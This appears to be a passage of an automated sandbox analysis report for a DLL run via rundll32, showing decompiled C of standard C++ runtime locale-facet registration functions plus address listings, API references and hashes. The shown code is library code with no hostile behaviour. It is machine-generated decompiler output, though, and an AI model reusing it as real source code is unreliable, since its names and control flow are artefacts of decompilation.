																																					 *((intOrPtr*)( *((intOrPtr*)( *_t522 + 4))))();
																																					 *0x6e2c6e00 = _t522;
																																					goto L75;
																																				}
																																			} else {
																																				_t522 = _t535;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t521 =  *(_t550 - 0x10);
																																		 *(_t550 - 0x10) = _t521;
																																		 *(_t550 - 4) = 1;
																																		E6E206FD3(__eflags, _t521);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t521 + 4))))();
																																		 *0x6e2c6dcc = _t521;
																																		goto L68;
																																	}
																																} else {
																																	_t521 = _t534;
																																	goto L68;
																																}
																															}
																														} else {
																															_t520 =  *(_t550 - 0x10);
																															 *(_t550 - 0x10) = _t520;
																															 *(_t550 - 4) = 1;
																															E6E206FD3(__eflags, _t520);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t520 + 4))))();
																															 *0x6e2c6dfc = _t520;
																															goto L61;
																														}
																													} else {
																														_t520 = _t533;
																														goto L61;
																													}
																												}
																											} else {
																												_t519 =  *(_t550 - 0x10);
																												 *(_t550 - 0x10) = _t519;
																												 *(_t550 - 4) = 1;
																												E6E206FD3(__eflags, _t519);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t519 + 4))))();
																												 *0x6e2c6de0 = _t519;
																												goto L54;
																											}
																										} else {
																											_t519 = _t532;
																											goto L54;
																										}
																									}
																								} else {
																									_t518 =  *(_t550 - 0x10);
																									 *(_t550 - 0x10) = _t518;
																									 *(_t550 - 4) = 1;
																									E6E206FD3(__eflags, _t518);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t518 + 4))))();
																									 *0x6e2c6ddc = _t518;
																									goto L47;
																								}
																							} else {
																								_t518 = _t531;
																								goto L47;
																							}
																						}
																					} else {
																						_t517 =  *(_t550 - 0x10);
																						 *(_t550 - 0x10) = _t517;
																						 *(_t550 - 4) = 1;
																						E6E206FD3(__eflags, _t517);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t517 + 4))))();
																						 *0x6e2c6db0 = _t517;
																						goto L40;
																					}
																				} else {
																					_t517 = _t530;
																					goto L40;
																				}
																			}
																		} else {
																			_t516 =  *(_t550 - 0x10);
																			 *(_t550 - 0x10) = _t516;
																			 *(_t550 - 4) = 1;
																			E6E206FD3(__eflags, _t516);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t516 + 4))))();
																			 *0x6e2c6dd8 = _t516;
																			goto L33;
																		}
																	} else {
																		_t516 = _t529;
																		goto L33;
																	}
																}
															} else {
																_t515 =  *(_t550 - 0x10);
																 *(_t550 - 0x10) = _t515;
																 *(_t550 - 4) = 1;
																E6E206FD3(__eflags, _t515);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t515 + 4))))();
																 *0x6e2c6dc4 = _t515;
																goto L26;
															}
														} else {
															_t515 = _t528;
															goto L26;
														}
													}
												} else {
													_t514 =  *(_t550 - 0x10);
													 *(_t550 - 0x10) = _t514;
													 *(_t550 - 4) = 1;
													E6E206FD3(__eflags, _t514);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t514 + 4))))();
													 *0x6e2c6dc8 = _t514;
													goto L19;
												}
											} else {
												_t514 = _t527;
												goto L19;
											}
										}
									} else {
										_t513 =  *(_t550 - 0x10);
										 *(_t550 - 0x10) = _t513;
										 *(_t550 - 4) = 1;
										E6E206FD3(__eflags, _t513);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t513 + 4))))();
										 *0x6e2c6df4 = _t513;
										goto L12;
									}
								} else {
									_t513 = _t526;
									goto L12;
								}
							}
						} else {
							_t512 =  *(_t550 - 0x10);
							 *(_t550 - 0x10) = _t512;
							 *(_t550 - 4) = 1;
							E6E206FD3(__eflags, _t512);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t512 + 4))))();
							 *0x6e2c6df8 = _t512;
							goto L5;
						}
					} else {
						_t512 = _t525;
						goto L5;
					}
				}
			}










































                          0x6e20f567
                          0x6e20f567
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f598
                          0x6e20f59d
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F56E
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F578
                          • int.LIBCPMT ref: 6E20F58F
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E20F5B2
                          • std::_Facet_Register.LIBCPMT ref: 6E20F5C9
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F5E9
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F607
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID:
                          • API String ID: 113178234-0
                          • Opcode ID: 0d964810bfd792dfd90f7f1dbdabeb84099d0821db2dab1f33aed50f754c40d3
                          • Instruction ID: 4430a788135ba6fe5c0d3a1d7bd1b584371bfa209c41759e8d9901a041af72ae
                          • Opcode Fuzzy Hash: 0d964810bfd792dfd90f7f1dbdabeb84099d0821db2dab1f33aed50f754c40d3
                          • Instruction Fuzzy Hash: 4E11067991051E8FCF05DFE4C894AEEB77BBF94718F240918E4216B2D0DB749A84C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20A2F1, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 70%
                          			E6E20A2F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr* _v12;
				void* _v16;
				char _v20;
				char _v32;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t44;
				void* _t52;

				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t52 =  *0x6e2c6cd4; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t52;
				_t21 = E6E1E161C(0x6e2c6cc0);
				_t40 = _a8;
				_t22 = E6E1E171B(_a8, _t21);
				_t50 = _t22;
				if(_t22 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t50);
				} else {
					if(_t52 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20AB08(__ebx, _t40, __edx, _t50, _t52) - 0xffffffff;
						if(__eflags == 0) {
							_t44 =  &_v32;
							E6E1E1438(_t44);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							_push(_t44);
							 *((intOrPtr*)(_t44 + 4)) = _a4;
							_v12 = _t44;
							 *_t44 = 0x6e26ba24;
							return _t44;
						} else {
							_t50 = _v16;
							_v16 = _t50;
							_v4 = 1;
							E6E206FD3(__eflags, _t50);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4))))();
							 *0x6e2c6cd4 = _t50;
							goto L5;
						}
					} else {
						_t50 = _t52;
						goto L5;
					}
				}
			}












                          0x6e20a2f8
                          0x6e20a302
                          0x6e20a307
                          0x6e20a312
                          0x6e20a316
                          0x6e20a319
                          0x6e20a31e
                          0x6e20a322
                          0x6e20a327
                          0x6e20a32b
                          0x6e20a370
                          0x6e20a373
                          0x6e20a37f
                          0x6e20a32d
                          0x6e20a32f
                          0x6e20a335
                          0x6e20a33b
                          0x6e20a343
                          0x6e20a346
                          0x6e20a380
                          0x6e20a383
                          0x6e20a391
                          0x6e20a396
                          0x6e20a39a
                          0x6e20a39e
                          0x6e20a3a3
                          0x6e20a3a6
                          0x6e20a3ad
                          0x6e20a348
                          0x6e20a348
                          0x6e20a34b
                          0x6e20a34f
                          0x6e20a353
                          0x6e20a360
                          0x6e20a368
                          0x6e20a36a
                          0x00000000
                          0x6e20a36a
                          0x6e20a331
                          0x6e20a331
                          0x00000000
                          0x6e20a331
                          0x6e20a32f

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20A2F8
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20A302
                          • int.LIBCPMT ref: 6E20A319
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • numpunct.LIBCPMT ref: 6E20A33C
                          • std::_Facet_Register.LIBCPMT ref: 6E20A353
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A373
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20A391
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
                          • String ID:
                          • API String ID: 2509942033-0
                          • Opcode ID: 4874b7eead0ef606ae9065d7341ae4be5de678551fec6b4eda4d2aeb5f8608c6
                          • Instruction ID: 7e277367ff80e61130ca7e8184fd0f73f595a43bfe6d12f322f8be67388d697a
                          • Opcode Fuzzy Hash: 4874b7eead0ef606ae9065d7341ae4be5de678551fec6b4eda4d2aeb5f8608c6
                          • Instruction Fuzzy Hash: 2A1106B591052D8FCF04DBE0C898AEDB77BAF45714F540908E5106B2D0DF74AA44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20A059, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20A059(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v28;
				char _v32;
				void* _t77;
				intOrPtr* _t78;
				void* _t90;
				void* _t103;
				void* _t116;
				void* _t129;
				intOrPtr* _t196;
				intOrPtr* _t215;
				intOrPtr* _t216;
				intOrPtr* _t217;
				intOrPtr* _t218;
				void* _t220;
				intOrPtr* _t221;
				intOrPtr* _t222;
				intOrPtr* _t223;
				void* _t224;

				_t212 = __edx;
				_t161 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t220 =  *0x6e2c6cd8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t220;
				_t77 = E6E1E161C(0x6e2c6cc4);
				_t164 = _a8;
				_t78 = E6E1E171B(_a8, _t77);
				_t214 = _t78;
				if(_t78 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t214);
				} else {
					if(_t220 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20A96A(__ebx, _t164, __edx, _t214, _t220) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438( &_v32);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t214, _t220, 0x14);
							E6E206653( &_v20, 0);
							_t221 =  *0x6e2c6cc8; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t221;
							_t90 = E6E1E161C(0x6e2c6b38);
							_t171 = _a8;
							_t215 = E6E1E171B(_a8, _t90);
							__eflags = _t215;
							if(_t215 != 0) {
								L12:
								E6E2066BA( &_v20);
								return E6E220075(_t215);
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E20A9D2(_t161, _t171, __edx, _t215, _t221) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438( &_v32);
										E6E223D74( &_v32, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t161, _t215, _t221, 0x14);
										E6E206653( &_v20, 0);
										_t222 =  *0x6e2c6ccc; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t222;
										_t103 = E6E1E161C(0x6e2c6cb8);
										_t178 = _a8;
										_t216 = E6E1E171B(_a8, _t103);
										__eflags = _t216;
										if(_t216 != 0) {
											L19:
											E6E2066BA( &_v20);
											return E6E220075(_t216);
										} else {
											__eflags = _t222;
											if(_t222 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E20AA38(_t161, _t178, __edx, _t216, _t222) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438( &_v32);
													E6E223D74( &_v32, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t161, _t216, _t222, 0x14);
													E6E206653( &_v20, 0);
													_t223 =  *0x6e2c6cd0; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t223;
													_t116 = E6E1E161C(0x6e2c6cbc);
													_t185 = _a8;
													_t217 = E6E1E171B(_a8, _t116);
													__eflags = _t217;
													if(_t217 != 0) {
														L26:
														E6E2066BA( &_v20);
														return E6E220075(_t217);
													} else {
														__eflags = _t223;
														if(_t223 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6E20AAA0(_t161, _t185, _t212, _t217, _t223) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438( &_v32);
																E6E223D74( &_v32, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t161, _t217, _t223, 0x14);
																E6E206653( &_v20, 0);
																_t224 =  *0x6e2c6cd4; // 0x0
																_v4 = _v4 & 0x00000000;
																_v16 = _t224;
																_t129 = E6E1E161C(0x6e2c6cc0);
																_t192 = _a8;
																_t218 = E6E1E171B(_a8, _t129);
																__eflags = _t218;
																if(_t218 != 0) {
																	L33:
																	E6E2066BA( &_v20);
																	return E6E220075(_t218);
																} else {
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_push(_a8);
																		_push( &_v16);
																		__eflags = E6E20AB08(_t161, _t192, _t212, _t218, _t224) - 0xffffffff;
																		if(__eflags == 0) {
																			_t196 =  &_v32;
																			E6E1E1438(_t196);
																			E6E223D74( &_v32, 0x6e2c3504);
																			asm("int3");
																			_push(_t196);
																			 *((intOrPtr*)(_t196 + 4)) = _v12;
																			_v28 = _t196;
																			 *_t196 = 0x6e26ba24;
																			return _t196;
																		} else {
																			_t218 = _v16;
																			_v16 = _t218;
																			_v4 = 1;
																			E6E206FD3(__eflags, _t218);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t218 + 4))))();
																			 *0x6e2c6cd4 = _t218;
																			goto L33;
																		}
																	} else {
																		_t218 = _t224;
																		goto L33;
																	}
																}
															} else {
																_t217 = _v16;
																_v16 = _t217;
																_v4 = 1;
																E6E206FD3(__eflags, _t217);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4))))();
																 *0x6e2c6cd0 = _t217;
																goto L26;
															}
														} else {
															_t217 = _t223;
															goto L26;
														}
													}
												} else {
													_t216 = _v16;
													_v16 = _t216;
													_v4 = 1;
													E6E206FD3(__eflags, _t216);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t216 + 4))))();
													 *0x6e2c6ccc = _t216;
													goto L19;
												}
											} else {
												_t216 = _t222;
												goto L19;
											}
										}
									} else {
										_t215 = _v16;
										_v16 = _t215;
										_v4 = 1;
										E6E206FD3(__eflags, _t215);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t215 + 4))))();
										 *0x6e2c6cc8 = _t215;
										goto L12;
									}
								} else {
									_t215 = _t221;
									goto L12;
								}
							}
						} else {
							_t214 = _v16;
							_v16 = _t214;
							_v4 = 1;
							E6E206FD3(__eflags, _t214);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t214 + 4))))();
							 *0x6e2c6cd8 = _t214;
							goto L5;
						}
					} else {
						_t214 = _t220;
						goto L5;
					}
				}
			}

























                          0x6e20a059
                          0x6e20a059
                          0x6e20a060
                          0x6e20a06a
                          0x6e20a06f
                          0x6e20a07a
                          0x6e20a07e
                          0x6e20a081
                          0x6e20a086
                          0x6e20a08a
                          0x6e20a08f
                          0x6e20a093
                          0x6e20a0d8
                          0x6e20a0db
                          0x6e20a0e7
                          0x6e20a095
                          0x6e20a097
                          0x6e20a09d
                          0x6e20a0a3
                          0x6e20a0ab
                          0x6e20a0ae
                          0x6e20a0eb
                          0x6e20a0f9
                          0x6e20a0fe
                          0x6e20a106
                          0x6e20a110
                          0x6e20a115
                          0x6e20a120
                          0x6e20a124
                          0x6e20a127
                          0x6e20a12c
                          0x6e20a135
                          0x6e20a137
                          0x6e20a139
                          0x6e20a17e
                          0x6e20a181
                          0x6e20a18d
                          0x6e20a13b
                          0x6e20a13b
                          0x6e20a13d
                          0x6e20a143
                          0x6e20a149
                          0x6e20a151
                          0x6e20a154
                          0x6e20a191
                          0x6e20a19f
                          0x6e20a1a4
                          0x6e20a1ac
                          0x6e20a1b6
                          0x6e20a1bb
                          0x6e20a1c6
                          0x6e20a1ca
                          0x6e20a1cd
                          0x6e20a1d2
                          0x6e20a1db
                          0x6e20a1dd
                          0x6e20a1df
                          0x6e20a224
                          0x6e20a227
                          0x6e20a233
                          0x6e20a1e1
                          0x6e20a1e1
                          0x6e20a1e3
                          0x6e20a1e9
                          0x6e20a1ef
                          0x6e20a1f7
                          0x6e20a1fa
                          0x6e20a237
                          0x6e20a245
                          0x6e20a24a
                          0x6e20a252
                          0x6e20a25c
                          0x6e20a261
                          0x6e20a26c
                          0x6e20a270
                          0x6e20a273
                          0x6e20a278
                          0x6e20a281
                          0x6e20a283
                          0x6e20a285
                          0x6e20a2ca
                          0x6e20a2cd
                          0x6e20a2d9
                          0x6e20a287
                          0x6e20a287
                          0x6e20a289
                          0x6e20a28f
                          0x6e20a295
                          0x6e20a29d
                          0x6e20a2a0
                          0x6e20a2dd
                          0x6e20a2eb
                          0x6e20a2f0
                          0x6e20a2f8
                          0x6e20a302
                          0x6e20a307
                          0x6e20a312
                          0x6e20a316
                          0x6e20a319
                          0x6e20a31e
                          0x6e20a327
                          0x6e20a329
                          0x6e20a32b
                          0x6e20a370
                          0x6e20a373
                          0x6e20a37f
                          0x6e20a32d
